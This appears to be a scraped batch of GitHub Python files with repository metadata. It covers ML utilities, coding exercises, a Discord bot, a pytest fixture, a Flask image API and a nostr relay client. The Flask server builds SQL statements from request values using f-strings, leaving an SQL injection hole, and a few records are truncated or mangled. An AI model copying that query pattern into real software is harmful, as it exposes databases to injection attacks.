function(self,method,neurons):\n for neuron in neurons:\n neuron.weights += self.methods[method](self,neuron.weights_derivative,neuron.weights_momentum)\n neuron.bias += 
self.methods[method](self,neuron.bias_derivative,neuron.bias_momentum)\n return neurons\n\n methods={\n 'gredientDescent': gredientDescent,\n 'momentum': momentum\n }","repo_name":"yuvisu/hugo-ml-toolkit","sub_path":"functions/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9060448625","text":"import scraper\nval = 1\n\ndef test_download():\n global val\n with open ('Test/' + str(val), 'w') as file:\n file.write(str(val) + '\\n')\n #parser = BeautifulSoup(resp.raw_response.content, 'html.parser')\n\n #file.write(parser.get_text())\n #file.write(''.join([x for x in parser.body.find_all(text=True)]))\n val += 1\n\n\n\nif __name__ == '__main__':\n class Val:\n status = 200\n ","repo_name":"RithwikKerur/CS121Project2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35066128467","text":"# Author: Omkar Dixit\n# Email: ond170030@utdallas.edu\n\n'''\nIs Unique: Implement an algorithm to determine if a string has all unique characters. What if you\ncannot use additional data structures?\n'''\n\nfrom collections import Counter\nimport sys\n\n\"\"\"\nTime Complexity: O(n), since Counter() construction will take O(n) time, \nthen most_common(k) takes O(nlogk) since k is 1 here it will be just O(n)\n\"\"\"\ndef isUnique(str):\n if Counter(str).most_common(1)[0][1] > 1:\n return False\n return True\n\nif __name__==\"__main__\":\n # print(sys.argv)\n if len(sys.argv)==1:\n print(\"No String Detected\")\n else:\n print(isUnique(sys.argv[1].strip()))\n ","repo_name":"dixitomkar1809/Coding-Python","sub_path":"CtCi/Array&Strings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8213650014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 09:48:49 2018\nhttps://geohackweek.github.io/vector/04-geopandas-intro/\n@author: ow4253\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\nfrom os import path\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom shapely.geometry import Point\nimport pandas as pd\nimport geopandas as gpd\nfrom geopandas import GeoSeries, GeoDataFrame\nfrom shapely.wkt import loads\ndata_path = r\"C:\\Users\\ow4253\\Documents\\FMEData\\spatial\\shapefileplay\"\n\nGeoSeries([loads('POINT(1 2)'), loads('POINT(1.5 2.5)'), loads('POINT(2 3)')])\ngs = GeoSeries([Point(-120, 45), Point(-121.2, 46), Point(-122.9, 47.5)])\ngs.crs = {'init': 'epsg:4326'}\ngs.plot(marker='*', color='red', markersize=100, figsize=(4, 4))\nplt.xlim([-123, -119.8])\nplt.ylim([44.8, 47.7]);\n\ndata = {'name': ['a', 'b', 'c'],\n 'lat': [45, 46, 47.5],\n 'lon': [-120, -121.2, -122.9]}\n\ngeometry = [Point(xy) for xy in zip(data['lon'], data['lat'])]\ngs = GeoSeries(geometry, index=data['name'])\ndf = pd.DataFrame(data)\ngeometry = [Point(xy) for xy in zip(df['lon'], df['lat'])]\ngdf = GeoDataFrame(df, geometry=geometry)\ngdf.plot(marker='*', color='green', markersize=100, figsize=(5, 5));\nsites = gpd.read_file(path.join(data_path,\"nsbbuf.shp\"))\nsites.crs\nsites.plot(cmap=\"Set1\", figsize=(10,10))\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\nworld.head(2)\nworld.crs\nworld.plot(ax=sites.plot(cmap='Set2', figsize=(10, 
10)), facecolor='gray');\n","repo_name":"mygethub-99/geostore","sub_path":"pandasScripts/geohack1.py","file_name":"geohack1.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72134036969","text":"from typing import List\n\n\nclass Solution:\n ANS = []\n SUB_ANS = []\n SET = []\n number = []\n\n def search(self, step, now):\n if step == self.number:\n self.ANS.append(self.SUB_ANS[:])\n return\n if now >= len(self.SET):\n return\n self.SUB_ANS.append(self.SET[now])\n self.search(step + 1, now + 1)\n del self.SUB_ANS[-1]\n self.search(step, now + 1)\n\n def combine(self, n: int, k: int) -> List[List[int]]:\n set = [i + 1 for i in range(n)]\n self.SET = set\n self.ANS = []\n self.SUB_ANS = []\n self.number = k\n self.search(0, 0)\n return self.ANS\n\n\nif __name__ == '__main__':\n n = 4\n k = 2\n print(Solution().combine(n, k))\n\n","repo_name":"kelolemon/homework","sub_path":"python_project/lt77.py","file_name":"lt77.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17337699570","text":"n=int(input(\"How many numbers do you want to add? \\n\"))\n\nlist=[]\n\ni=0\nwhile i0:\n print(i, end=\" \")","repo_name":"akshatjain7703/MyCaptain","sub_path":"2B.py","file_name":"2B.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32684432123","text":"#!/usr/bin/env python\n##\n## namemerge.py - merge organization names.\n##\n\nimport re\n\nFULLWIDTH = (\n ' !”#$%&’()*+,\\uff0d\\u2212./0123456789:;<=>?'\n '@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_'\n '‘abcdefghijklmnopqrstuvwxyz{|}'\n)\nHALFWIDTH = (\n ' !\\\"#$%&\\'()*+,--./0123456789:;<=>?'\n '@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_'\n '`abcdefghijklmnopqrstuvwxyz{|}'\n)\nZ2HMAP = dict( (ord(zc), ord(hc)) for (zc,hc) in zip(FULLWIDTH, HALFWIDTH) )\n\ndef zen2han(s):\n return s.translate(Z2HMAP)\n\n\n## NameMerger\n##\nclass NameMerger:\n\n def __init__(self, short_threshold=0.9, long_threshold=0.3):\n self.short_threshold = short_threshold\n self.long_threshold = long_threshold\n self.items = []\n self.ss = {}\n return\n\n def add(self, key, *args):\n if not args:\n args = key\n key = zen2han(re.sub(r'\\W', '', key))\n pid = len(self.items)\n self.items.append((key, args))\n for n in range(1, len(key)+1):\n for i in range(len(key)-n+1):\n s = key[i:i+n]\n if s in self.ss:\n a = self.ss[s]\n else:\n a = self.ss[s] = []\n a.append(pid)\n return\n\n def fixate(self):\n clusters = []\n belongs = {}\n for (s,a) in sorted(self.ss.items(), key=lambda x: len(x[0])):\n for (i,pid1) in enumerate(a):\n (key1,_) = self.items[pid1]\n prop1 = len(s)/len(key1)\n for pid2 in a[i+1:]:\n (key2,_) = self.items[pid2]\n prop2 = len(s)/len(key2)\n if max(prop1, prop2) < self.short_threshold: continue\n if min(prop1, prop2) < self.long_threshold: continue\n if pid1 in belongs:\n c1 = belongs[pid1]\n if pid2 in belongs:\n # merge: c1 <- c2, erase: c2.\n c2 = belongs[pid2]\n if c1 is not c2:\n c1.extend(c2)\n for pid in c2:\n belongs[pid] = c1\n clusters.remove(c2)\n else:\n # join: c1 <- pid2.\n c1.append(pid2)\n belongs[pid2] = c1\n elif pid2 in belongs:\n # join: c2 <- pid1.\n c2 = belongs[pid2]\n c2.append(pid1)\n belongs[pid1] = c2\n else:\n # new cluster\n c = [pid1, pid2]\n clusters.append(c)\n belongs[pid1] = c\n belongs[pid2] = c\n clusters.sort(key=len, reverse=True)\n for 
pid in range(len(self.items)):\n if pid not in belongs:\n clusters.append([pid])\n for c in clusters:\n yield [ self.items[pid][1] for pid in c ]\n return\n\nif __name__ == '__main__':\n import fileinput\n m = NameMerger()\n for line in fileinput.input():\n m.add(line.strip())\n for c in m.fixate():\n print(len(c), c)\n","repo_name":"euske/python3-toys","sub_path":"namemerge.py","file_name":"namemerge.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"3361710421","text":"from discord.ext import commands\nimport discord\nimport json\n\nwith open(\"config/presets.json\") as presets:\n\tconfig = json.load(presets)\n\n\nTOKEN = config[\"token\"]\nPREFIX = config[\"prefix\"]\n\n\nbot = commands.Bot(command_prefix=PREFIX)\nbot.remove_command(\"help\")\n\ncogs = [\n\t\"cogs.events\",\n\t\"cogs.commands\",\n\t\"cogs.modcommands\",\n]\n\nfor cog in cogs:\n\tbot.load_extension(cog)\n\t# print(\"Loaded Cog Files: {}\".format(cog[])) used for debugging purposed\n\n\nbot.run(TOKEN, reconnect=True)","repo_name":"C1tad31/EvilCoreDiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71826323047","text":"import pytest\nimport yaml\nfrom checkout import checkout, getout\nfrom datetime import datetime\n\nwith open(\"config.yaml\", encoding='UTF-8') as f:\n data = yaml.safe_load(f)\n\n\n@pytest.fixture()\ndef make_folder():\n yield checkout(f\"mkdir -p {data.get('folder_in')} {data.get('folder_out')} {data.get('folder_fld')}\", \"\")\n return checkout(f\"rm -r {data.get('folder_in')} {data.get('folder_out')} {data.get('folder_fld')}\", \"\")\n\n\n@pytest.fixture()\ndef make_file():\n return checkout(f\"cd {data.get('folder_in')}; touch file1 file2 file3\", \"\")\n\n\n@pytest.fixture(autouse=True)\ndef write_stat():\n yield\n stat = getout(\"cat /proc/loadavg\")\n checkout(f\"'time: {datetime.now().strftime('%H:%M:%S.%f')} count:{data.get('count')} size: {data.get('bs')} \"\n f\"load: {stat}' >> stat.txt\", \"\")","repo_name":"natkuz/PLTestThree","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13261069170","text":"\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0 , 0] #우좌하상\nfor tc in range(1, int(input()) + 1):\n\n\n N = int(input())\n maze = [input() for _ in range(N)]\n #maze = [list(map(int, input())) for _ in range(N)]\n\n sx = sy = ex = ey = 0\n for i in range(N):\n for j in range(N):\n if maze[i][j] == '2':\n sx, sy = i, j\n elif maze[i][j] == '3':\n ex, ey = i, j\n\n visit = [[0] * N for _ in range(N)]\n Q = [[sx, sy]]\n visit[sx][sy] = 1\n\n while Q:\n x, y = Q.pop(0)\n for i in range(4):\n tx, ty = x + dx[i], y+ dy[i]\n # 경계 체크, 통로 인지, 방문 정보 체크\n if tx < 0 or tx == N or ty <0 or ty == N: continue\n if maze[tx][ty] == '1' or visit[tx][ty]: continue\n visit[tx][ty] = visit[x][y] + 1\n Q.append([tx, ty])\n if visit[ex][ey]: visit[ex][ey] -= 2\n print(visit[ex][ey])","repo_name":"kanamycine/surely-kill-algorithm","sub_path":"[0903]Algorithm/5105-3.py","file_name":"5105-3.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36109568709","text":"from flask import Flask, g, request, jsonify\nimport os\nimport 
sqlite3\nimport time\nimport json\nimport validators\n\napp = Flask(__name__)\n\n# Establishes connection to db and associated cursor\ndef init_db():\n g.db = sqlite3.connect('database.db')\n # Use sqlite3.Row type to get name-based access to columns\n g.db.row_factory = sqlite3.Row\n g.cursor = g.db.cursor()\n\n@app.route('/get_num_image_records')\ndef get_num_image_records():\n if 'db' not in g:\n init_db()\n \n # Fetch number of rows for pagination\n g.cursor.execute(\"SELECT COUNT(*) as count FROM images\")\n num_image_records = dict(g.cursor.fetchone())['count']\n\n return { 'num_image_records' : num_image_records } \n\n@app.route('/get_images')\ndef get_images():\n if 'db' not in g:\n init_db()\n \n limit = request.args.get('limit') or 100\n offset = request.args.get('offset') or 0\n\n # Fetch rows according to limit and offset\n g.cursor.execute(f'SELECT rowid, * FROM images LIMIT {limit} OFFSET {offset}')\n image_rows = []\n for row in g.cursor.fetchall():\n image_rows.append(dict(row))\n\n return { 'images' : image_rows } \n\n@app.route('/add_image', methods=['POST'])\ndef add_image():\n if 'db' not in g:\n init_db()\n\n post_body = json.loads(request.data.decode('utf-8'))\n name = post_body['name']\n path = post_body['path']\n\n if (validators.url(path)):\n g.cursor.execute(f'INSERT INTO images (name, path) VALUES (\\'{name}\\', \\'{path}\\')')\n g.db.commit()\n \n last_row_id = g.cursor.lastrowid\n \n return { 'last_row_id': last_row_id }\n else:\n return jsonify({ 'error': 'The provided path is an invalid URL.'}), 404\n\n@app.route('/delete_image/', methods=['DELETE'])\ndef delete_image(image_id):\n if 'db' not in g:\n init_db()\n try:\n g.cursor.execute(f'DELETE FROM images WHERE ROWID = {image_id}')\n g.db.commit()\n\n return \"Image succesfully deleted\"\n except:\n return jsonify({ 'error': 'The requested image could not be deleted. The provided image ID is invalid.'}), 404\n","repo_name":"jeffreyzhang2001/shopify-image-repository","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636675736","text":"import re\n\n\ndef find_health(text: str):\n reg = r\"[^0-9\\+\\-\\*\\/\\.]\"\n return sum([ord(x) for x in re.findall(reg, text)])\n\n\ndef find_damage(text: str):\n reg = r\"(?:\\+|-)?[0-9]+(?:\\.[0-9]+)?\"\n reg_3 = r\"[\\*\\/]\"\n numbers = [float(x) for x in re.findall(reg, text)]\n damage = sum(numbers)\n manipulators = re.findall(reg_3, text)\n for i in manipulators:\n if i == '*':\n damage *= 2\n else:\n damage /= 2\n\n return damage\n\n\ndemons_list = input().split(',')\ndemons_list = [x.strip() for x in demons_list]\nfor demon in sorted(demons_list):\n print(f'{demon} - {find_health(demon)} health, {find_damage(demon):.2f} damage')\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/ReGex/More_Exercises/Nether_Realms.py","file_name":"Nether_Realms.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"15740689714","text":"def arithmetic_arranger(problems,results=None):\n\n # First, we check if there are too many problems. 
The limit is five.\n arranged_problems = ''\n number_of_problems = int(len(problems))\n if number_of_problems > 5:\n msg = 'Error: Too many problems.'\n return msg\n \n # Then we split each problem into it's constituent parts and check for errors: only addition and substraction allowed and each operand should have a max of four digits in width.\n operand1 = []\n operator = []\n operand2 = []\n for item in problems:\n parts = item.split()\n if len(parts[0]) > 4:\n msg = 'Error: Numbers cannot be more than four digits.'\n return msg\n if len(parts[2]) > 4:\n msg = 'Error: Numbers cannot be more than four digits.'\n return msg\n if parts[1] != '+' and parts[1] != '-':\n msg = \"Error: Operator must be '+' or '-'.\"\n return msg\n operand1.append(parts[0])\n operator.append(parts[1])\n operand2.append(parts[2])\n \n # After that, we format the strings\n first_row_list = []\n second_row_list = []\n dashes_row_list = []\n\n for i in range(number_of_problems):\n if len(operand1[i]) > len(operand2[i]):\n formatted_operand1 = ' ' + operand1[i]\n first_row_list.append(formatted_operand1)\n filler = len(formatted_operand1) - len(operand2[i]) - 1 # -1 is the operator\n formatted_operand2 = operator[i] + ' '*filler + operand2[i]\n second_row_list.append(formatted_operand2)\n if len(operand1[i]) < len(operand2[i]):\n formatted_operand2 = operator[i] + ' ' + operand2[i]\n second_row_list.append(formatted_operand2)\n filler = len(formatted_operand2) - len(operand1[i])\n formatted_operand1 = ' '*filler + operand1[i]\n first_row_list.append(formatted_operand1)\n if len(operand1[i]) == len(operand2[i]):\n formatted_operand1 = ' ' + operand1[i]\n first_row_list.append(formatted_operand1)\n formatted_operand2 = operator[i] + ' ' + operand2[i]\n second_row_list.append(formatted_operand2)\n dashes = '-'*len(formatted_operand2)\n dashes_row_list.append(dashes)\n\n # And we calculate the results and check for errors\n results_list = []\n results_row_list = []\n for i in range(number_of_problems):\n try: \n if operator[i] == '+':\n x = int(operand1[i]) + int(operand2[i])\n results_list.append(str(x))\n if operator[i] == '-':\n x = int(operand1[i]) - int(operand2[i])\n results_list.append(str(x))\n except:\n msg = 'Error: Numbers must only contain digits.'\n return msg\n filler = len(dashes_row_list[i]) - len(results_list[i])\n formatted_result = ' '*filler + str(results_list[i])\n results_row_list.append(formatted_result)\n \n # Finally, we assemble everything\n\n spaces = ' '\n first_row = spaces.join(first_row_list) + '\\n'\n second_row = spaces.join(second_row_list) + '\\n'\n dashes_row = spaces.join(dashes_row_list)\n results_row = '\\n' + spaces.join(results_row_list)\n\n arranged_problems = first_row + second_row + dashes_row\n\n # And if asked for results we proceed to add them to the final string\n if results == True:\n arranged_problems = first_row + second_row + dashes_row + results_row\n\n return arranged_problems","repo_name":"PatoThompson/freeCodeCamp","sub_path":"Scientific Computing with Python/Arithmetic Formatter/arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44344462980","text":"# -*- coding: utf-8 -*-\n\nENV_DEV = 'dev'\nENV_TEST = 'test'\nENV_PROD = 'prod'\nENV_SHELL = 'SHELL'\n\n# syslog socket, no journald distribution\nSYSLOG_SOCKET = \"/run/systemd/journal/syslog\"\n\n# grpc conf\nDEFAULT_APP_PORT = 
8010\n","repo_name":"v1c77/gogo","sub_path":"gogo/vos/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72119403687","text":"import asyncio\nimport secrets\nimport time\nimport sys\nimport logging\nfrom contextlib import asynccontextmanager\nfrom collections import defaultdict, namedtuple\nfrom websockets import connect, exceptions\nfrom .event import Event\n\ntry:\n from rapidjson import dumps, loads\nexcept ImportError:\n from json import dumps, loads\n\nif hasattr(asyncio, 'timeout'):\n timeout = asyncio.timeout\nelse:\n # python < 3.11 does not have asyncio.timeout\n # rather than re-implement it, we'll just do nothing\n @asynccontextmanager\n async def timeout(duration):\n yield\n\n\nSubscription = namedtuple('Subscription', ['filters','queue'])\n\n\nclass Relay:\n \"\"\"\n Interact with a relay\n \"\"\"\n def __init__(self, url, verbose=False, origin:str = '', private_key:str='', connect_timeout: float=2.0, log=None):\n self.log = log or logging.getLogger(__name__)\n self.url = url\n self.ws = None\n self.receive_task = None\n self.subscriptions = defaultdict(lambda: Subscription(filters=[], queue=asyncio.Queue()))\n self.event_adds = asyncio.Queue()\n self.notices = asyncio.Queue()\n self.private_key = private_key\n self.origin = origin or url\n self.connected = False\n self.connect_timeout = connect_timeout\n\n async def connect(self, retries=5):\n for i in range(retries):\n try:\n async with timeout(self.connect_timeout):\n self.ws = await connect(self.url, origin=self.origin)\n except:\n await asyncio.sleep(0.2 * i)\n else:\n break\n else:\n raise Exception(f\"Cannot connect to {self.url}\")\n if self.receive_task is None:\n self.receive_task = asyncio.create_task(self._receive_messages())\n await asyncio.sleep(0.01)\n self.connected = True\n self.log.info(\"Connected to %s\", self.url)\n\n async def reconnect(self):\n await self.connect(20)\n for sub_id, sub in self.subscriptions.items():\n self.log.debug(\"resubscribing to %s\", sub.filters)\n await self.send([\"REQ\", sub_id, *sub.filters])\n\n async def close(self):\n if self.receive_task:\n self.receive_task.cancel()\n if self.ws:\n await self.ws.close()\n self.connected = False\n\n async def _receive_messages(self):\n while True:\n try:\n async with timeout(30.0):\n message = await self.ws.recv()\n\n self.log.debug(message)\n message = loads(message)\n if message[0] == 'EVENT':\n await self.subscriptions[message[1]].queue.put(Event(**message[2]))\n elif message[0] == 'EOSE':\n await self.subscriptions[message[1]].queue.put(None)\n elif message[0] == 'OK':\n await self.event_adds.put(message)\n elif message[0] == 'NOTICE':\n await self.notices.put(message[1])\n elif message[0] == 'AUTH':\n await self.authenticate(message[1])\n else:\n sys.stderr.write(message)\n except asyncio.CancelledError:\n return\n except exceptions.ConnectionClosedError:\n await self.reconnect()\n except asyncio.TimeoutError:\n continue\n except:\n import traceback; traceback.print_exc()\n\n async def send(self, message):\n try:\n await self.ws.send(dumps(message))\n except exceptions.ConnectionClosedError:\n await self.reconnect()\n await self.ws.send(dumps(message))\n\n async def add_event(self, event, check_response=False):\n if isinstance(event, Event):\n event = event.to_json_object()\n await self.send([\"EVENT\", event])\n if check_response:\n response = await self.event_adds.get()\n return response[1]\n\n async 
def subscribe(self, sub_id: str, *filters, queue=None):\n self.subscriptions[sub_id] = Subscription(filters=filters, queue=queue or asyncio.Queue())\n await self.send([\"REQ\", sub_id, *filters])\n return self.subscriptions[sub_id].queue\n\n async def unsubscribe(self, sub_id):\n await self.send([\"CLOSE\", sub_id])\n del self.subscriptions[sub_id]\n\n async def authenticate(self, challenge:str):\n if not self.private_key:\n import warnings\n warnings.warn(\"private key required to authenticate\")\n return\n from .key import PrivateKey\n if self.private_key.startswith('nsec'):\n from .util import from_nip19\n pk = from_nip19(self.private_key)['object']\n else:\n pk = PrivateKey(bytes.fromhex(self.private_key))\n auth_event = Event(\n kind=22242,\n pubkey=pk.public_key.hex(),\n tags=[\n ['challenge', challenge],\n ['relay', self.url]\n ]\n )\n auth_event.sign(pk.hex())\n await self.send([\"AUTH\", auth_event.to_json_object()])\n await asyncio.sleep(0.1)\n return True\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, ex_type, ex, tb):\n await self.close()\n\n\nclass Manager:\n \"\"\"\n Manage a collection of relays\n \"\"\"\n def __init__(self, relays=None, verbose=False, origin='aionostr', private_key=None, log=None):\n self.log = log or logging.getLogger(__name__)\n self.relays = [Relay(r, origin=origin, private_key=private_key, log=log) for r in (relays or [])]\n self.subscriptions = {}\n self.connected = False\n self._connectlock = asyncio.Lock()\n\n @property\n def private_key(self):\n return None\n\n @private_key.setter\n def private_key(self, pk):\n for relay in self.relays:\n relay.private_key = pk\n\n def add(self, url, **kwargs):\n self.relays.append(Relay(url, **kwargs))\n\n async def monitor_queues(self, queues, output):\n seen = set()\n num = len(queues)\n num_eose = 0\n while True:\n get_funcs = [queue.get() for queue in queues]\n for func in asyncio.as_completed(get_funcs):\n result = await func\n if result:\n eid = result.id_bytes\n if eid not in seen:\n await output.put(result)\n seen.add(eid)\n else:\n num_eose += 1\n if num_eose == num:\n await output.put(result)\n\n async def broadcast(self, func, *args, **kwargs):\n results = []\n for relay in self.relays:\n results.append(asyncio.create_task(getattr(relay, func)(*args, **kwargs)))\n\n self.log.debug(\"Waiting for %s\", func)\n return await asyncio.wait(results)\n\n async def connect(self):\n async with self._connectlock:\n if not self.connected:\n await self.broadcast('connect')\n self.connected = True\n tried = len(self.relays)\n connected = [relay for relay in self.relays if relay.connected]\n success = len(connected)\n self.relays = connected\n self.log.debug(\"Connected to %d out of %d relays\", success, tried)\n\n async def close(self):\n await self.broadcast('close')\n\n async def add_event(self, event, check_response=False):\n return await self.broadcast('add_event', event, check_response=check_response)\n\n async def subscribe(self, sub_id: str, *filters):\n queues = []\n for relay in self.relays:\n queues.append(await relay.subscribe(sub_id, *filters))\n queue = asyncio.Queue()\n self.subscriptions[sub_id] = asyncio.create_task(self.monitor_queues(queues, queue))\n return queue\n\n async def unsubscribe(self, sub_id):\n await self.broadcast('unsubscribe', sub_id)\n self.subscriptions[sub_id].cancel()\n del self.subscriptions[sub_id]\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, ex_type, ex, tb):\n await 
self.close()\n\n async def get_events(self, *filters, only_stored=True, single_event=False):\n sub_id = secrets.token_hex(4)\n queue = await self.subscribe(sub_id, *filters)\n while True:\n event = await queue.get()\n if event is None:\n if only_stored:\n break\n else:\n yield event\n if single_event:\n break\n await self.unsubscribe(sub_id)\n\n\n","repo_name":"davestgermain/aionostr","sub_path":"aionostr/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"22679983121","text":"import argparse\nimport os.path as osp\nimport torch\nfrom util.data import *\nfrom util.general import *\nfrom arch import MLP\nfrom torch.nn import CrossEntropyLoss\nfrom torch import optim\nfrom datetime import datetime\nfrom sys import stdout\nfrom scripts.global_constants import *\n\nfrom util.methods.subfunctions import subfunctions_pre, subfunctions_metric, \\\n bool_tensor_content_hash\nfrom util.two_moons import render_two_moons\nfrom PIL import Image\nfrom matplotlib import cm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\n# This prints the pretty plots.\n\ndef two_moons():\n # ------------------------------------------------------------------------------------------------\n # Arguments\n # ------------------------------------------------------------------------------------------------\n\n config = argparse.ArgumentParser(allow_abbrev=False)\n\n config.add_argument(\"--threshold_divs\", type=int, default=100)\n config.add_argument(\"--data\", type=str, choices=[\"two_moons\"], default=\"two_moons\")\n config.add_argument(\"--data_root\", type=str, default=\"\")\n config.add_argument(\"--batch_size\", type=int, default=256)\n config.add_argument(\"--workers\", type=int, default=1)\n config.add_argument(\"--models_root\", type=str, default=DEFAULT_MODELS_ROOT)\n config.add_argument(\"--seed\", type=int, nargs=\"+\",\n required=True) # to load the corresponding model, and for reproducibility\n config.add_argument(\"--cuda\", default=False, action=\"store_true\")\n config.add_argument(\"--suff\", type=str, default=\"\")\n\n config.add_argument(\"--model\", type=str, default=\"\")\n\n # for this two moons script only\n config.add_argument(\"--two_moons_norm_data\", default=False, action=\"store_true\")\n config.add_argument(\"--radius_mult\", type=float, default=1.5)\n\n subparsers = config.add_subparsers(dest=\"method\")\n\n subfunctions_config = subparsers.add_parser(\"subfunctions\")\n for subconfig in [subfunctions_config]:\n subconfig.add_argument(\"--search_deltas\", type=float, nargs=\"+\",\n default=[0.001, 0.01, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\n subconfig.add_argument(\"--search_ps\", type=float, nargs=\"+\",\n default=[1.0, 2.0, 4.0, 6.0, 8.0, 12.0, 16.0, 24.0, 32.0, 48.0, 64.0])\n subconfig.add_argument(\"--precompute\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--precompute_p_i\", type=int, default=-1)\n subconfig.add_argument(\"--pattern_batch_sz\", type=int,\n default=-1) # set to -1 to do whole dataset at once\n\n subconfig.add_argument(\"--no_bound\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--no_log\", default=False, action=\"store_true\")\n subconfig.add_argument(\"--dist_fn\", type=str, default=\"gaussian\", choices=[\"gaussian\"])\n subconfig.add_argument(\"--select_on_AUROC\", default=False, action=\"store_true\")\n\n config = config.parse_args()\n config.test_code_brute_force = 
False\n print(\"Config: %s\" % config)\n\n set_seed(config.seed[0]) # for reproducibility\n train_loader, val_loader, test_loader = get_data(config, val_pc=0.15, training=False)\n\n model = [\n torch.load(osp.join(config.models_root, \"%s_%d_%s.pytorch\" % (config.data, s, config.model)))[\n \"model\"].eval() for s in config.seed]\n acc = [\n torch.load(osp.join(config.models_root, \"%s_%d_%s.pytorch\" % (config.data, s, config.model)))[\n \"acc\"] for s in config.seed]\n if len(config.seed) == 1:\n config.seed = config.seed[0]\n model = model[0]\n acc = acc[0]\n else:\n raise NotImplementedError\n\n inspect_weights(model)\n\n # make our special val/test set - with much larger stdev, because on regular data it gets 100% acc\n # this is used to pick delta/p\n val_noise = 0.05\n num_val = len(val_loader.dataset)\n x_val, y_val = sk_datasets.make_moons(n_samples=num_val, shuffle=True, noise=val_noise,\n random_state=config.seed)\n x_val, y_val = torch.tensor(x_val, dtype=torch.float), torch.tensor(y_val)\n val_data = [(x_val[i], y_val[i]) for i in range(num_val)]\n\n max_abs = max([tup[0].abs().max() for tup in train_loader.dataset])\n rad = int(np.ceil(max_abs * config.radius_mult)) # some padding, 1.5\n print(\"grid is anchored: [%s, %s]\" % (-rad, rad))\n\n num_test_side = 501 # 101 # evenly sampled across entire surface of grid\n x_test = -rad + 2 * rad * torch.arange(num_test_side,\n dtype=torch.float) / num_test_side # -rad to rad\n x_test_0 = x_test.unsqueeze(0).repeat(num_test_side, 1).unsqueeze(2)\n x_test_1 = x_test.unsqueeze(1).repeat(1, num_test_side).unsqueeze(2)\n x_test = torch.cat([x_test_0, x_test_1], dim=2) # side, side, 2\n x_test = x_test.view(num_test_side ** 2, 2)\n\n x_test_inds = torch.arange(num_test_side, dtype=torch.float)\n x_test_inds_0 = x_test_inds.unsqueeze(0).repeat(num_test_side, 1).unsqueeze(2)\n x_test_inds_1 = x_test_inds.unsqueeze(1).repeat(1, num_test_side).unsqueeze(2)\n x_test_inds = torch.cat([x_test_inds_0, x_test_inds_1], dim=2)\n x_test_inds = x_test_inds.view(num_test_side ** 2, 2)\n\n x_all = torch.cat([x_test, x_test_inds], dim=1)\n assert (x_all.shape == (\n num_test_side ** 2, 4)) # [0, 0] in inds corresponds to [-rad, -rad] in data (coords)\n test_data = [(x_all[i], -1) for i in range(num_test_side ** 2)]\n\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=config.batch_size,\n shuffle=False, num_workers=config.workers,\n pin_memory=True)\n test_loader = torch.utils.data.DataLoader(test_data, batch_size=config.batch_size,\n shuffle=False, num_workers=config.workers,\n pin_memory=True)\n\n # render val\n render_two_moons(config, [val_loader], model_suff=\"\", suff=\"val\")\n\n # Store precomputations\n model, method_variables = globals()[\"%s_pre\" % config.method](config, model, train_loader,\n val_loader)\n\n # Run through test data batches, pass each batch to metric method along with needed params,\n # get metrics back, store with ground truth\n polytope_colours = {}\n polytope_img = np.zeros((num_test_side, num_test_side, 3),\n dtype=np.uint8) # x axis is first dim, as usual. 
